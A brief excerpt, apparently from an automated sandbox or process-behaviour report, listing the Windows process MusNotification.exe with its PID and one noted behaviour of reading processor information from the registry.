  Command line: C:\Windows\system32\MusNotification.exe
  - Checks processor information in registry
  PID: 1196